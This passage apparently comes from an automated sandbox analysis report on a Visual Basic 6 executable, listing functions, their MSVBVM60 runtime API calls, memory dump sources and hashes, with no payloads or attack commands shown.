                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba_adj_fdiv_m64
                                                                                                                                                                                  • String ID: h#@
                                                                                                                                                                                  • API String ID: 2746309926-1911584123
                                                                                                                                                                                  • Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                                                  • Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418E20 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                                                  • __vbaGetOwner3.MSVBVM60(00407524,0041B108,00000000), ref: 00418E78
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3413436688-0
                                                                                                                                                                                  • Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                                                  • Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E6A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2392155486-0
                                                                                                                                                                                  • Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                                                  • Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00417458 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Destruct$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1594393734-0
                                                                                                                                                                                  • Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                                                  • Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0041887E Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Destruct$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1594393734-0
                                                                                                                                                                                  • Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                                                  • Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410080 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 004100CE
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1207130036-0
                                                                                                                                                                                  • Opcode ID: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                                                  • Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E780 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2075080343-0
                                                                                                                                                                                  • Opcode ID: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                                                  • Instruction ID: 3bf4f8c77da95384cc45dd6dff3f381c91b1124e7f22c247587acc69ccce5f1d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                                                  • Instruction Fuzzy Hash: A1015B71940214ABCB00AFA5CE49EAABBB8FF48700F10456AF945B32A1C77854418EA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00419674 Relevance: 9.0, APIs: 6, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00419681
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041968B
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2014117853-0
                                                                                                                                                                                  • Opcode ID: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                                                  • Instruction ID: dfea4ae46e95b786737fd6ac62915e102b9398e5dcf88c16ee641d2aebd4778e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E01276821128AACB04EBA0FD206DC3BB8FB08310B118026E846B3174DB742D84CFA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00418980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$ExitOverflowProc
                                                                                                                                                                                  • String ID: XuA$x$@
                                                                                                                                                                                  • API String ID: 3328922952-1101804690
                                                                                                                                                                                  • Opcode ID: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                                                  • Instruction ID: f41aac51504d4341bf14d78ed7085f01873fde132ca3eda0e8d0e8435c4d1104
                                                                                                                                                                                  • Opcode Fuzzy Hash: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                                                  • Instruction Fuzzy Hash: 310180B5D00254AFC710DF989A056DDFBB4EB08B50F10426BE805A3350C77458408BEA
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E250 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4045702744-0
                                                                                                                                                                                  • Opcode ID: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                                                  • Instruction ID: b42082684cfda9da04a5b7e5b2bad02e9e7a05c797a4a6675c2a700778014143
                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87114A74900214ABCB00DFA6CD48EDEBFF8FF98700F24456AF445B72A0C77859418AA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%